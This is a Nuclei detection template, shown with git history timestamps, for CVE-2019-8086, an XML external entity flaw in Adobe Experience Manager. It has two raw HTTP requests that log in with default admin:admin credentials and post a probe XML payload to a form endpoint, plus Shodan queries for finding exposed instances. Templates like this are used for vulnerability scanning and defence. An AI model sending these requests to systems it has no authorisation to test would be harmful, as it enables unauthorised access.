nuclei-templates/http/cves/2019/CVE-2019-8086.yaml

69 lines
2.7 KiB
YAML
Raw Normal View History

2022-09-24 22:29:35 +00:00
id: CVE-2019-8086
info:
name: Adobe Experience Manager - XML External Entity Injection
2022-09-24 22:29:35 +00:00
author: DhiyaneshDk
severity: high
description: Adobe Experience Manager 6.5, 6.4, 6.3 and 6.2 are susceptible to XML external entity injection. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive information, server-side request forgery, and potential remote code execution.
2023-09-06 12:53:28 +00:00
remediation: |
Apply the necessary security patches provided by Adobe to mitigate the vulnerability. Additionally, ensure that the server is properly configured to restrict access to sensitive files and prevent XXE attacks.
2022-09-24 22:29:35 +00:00
reference:
- https://speakerdeck.com/0ang3el/a-hackers-perspective-on-aem-applications-security?slide=13
- https://github.com/0ang3el/aem-hacker/blob/master/aem_hacker.py
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2019-8086
- https://nvd.nist.gov/vuln/detail/CVE-2019-8086
2023-07-11 19:49:27 +00:00
- https://helpx.adobe.com/security/products/experience-manager/apsb19-48.html
2022-10-08 02:07:59 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2019-8086
cwe-id: CWE-611
epss-score: 0.12383
epss-percentile: 0.94862
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:adobe:experience_manager:6.2:*:*:*:*:*:*:*
2022-10-08 06:48:14 +00:00
metadata:
max-request: 2
2023-09-06 12:53:28 +00:00
vendor: adobe
product: experience_manager
2022-10-08 06:48:14 +00:00
shodan-query:
- http.title:"AEM Sign In"
- http.component:"Adobe Experience Manager"
2022-09-24 22:29:35 +00:00
tags: cve,cve2019,aem,adobe
2022-09-24 22:32:29 +00:00
http:
2022-09-24 22:29:35 +00:00
- raw:
- |
POST /content/{{randstr}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46YWRtaW4=
Referer: {{BaseURL}}
sling:resourceType=fd/af/components/guideContainer
- |
POST /content/{{randstr}}.af.internalsubmit.json HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
Authorization: Basic YWRtaW46YWRtaW4=
Referer: {{BaseURL}}
guideState={"guideState"%3a{"guideDom"%3a{},"guideContext"%3a{"xsdRef"%3a"","guidePrefillXml"%3a"<afData>\u0041\u0042\u0043</afData>"}}}
matchers-condition: and
matchers:
- type: word
part: body
words:
2022-09-26 06:45:17 +00:00
- '<afData>ABC<afBoundData/>'
2022-09-24 22:29:35 +00:00
- type: word
part: header
words:
- application/json
- type: status
status:
- 200
# digest: 4b0a00483046022100b7baf75be00ce5150a9fcb0f35a8f5bff4681912835fd9860875618a73405e93022100fc0586e12059e055bd751fb4f8faab79597fc04a5324ade4ed90eaca94489325:922c64590222798bb761d5b6d8e72950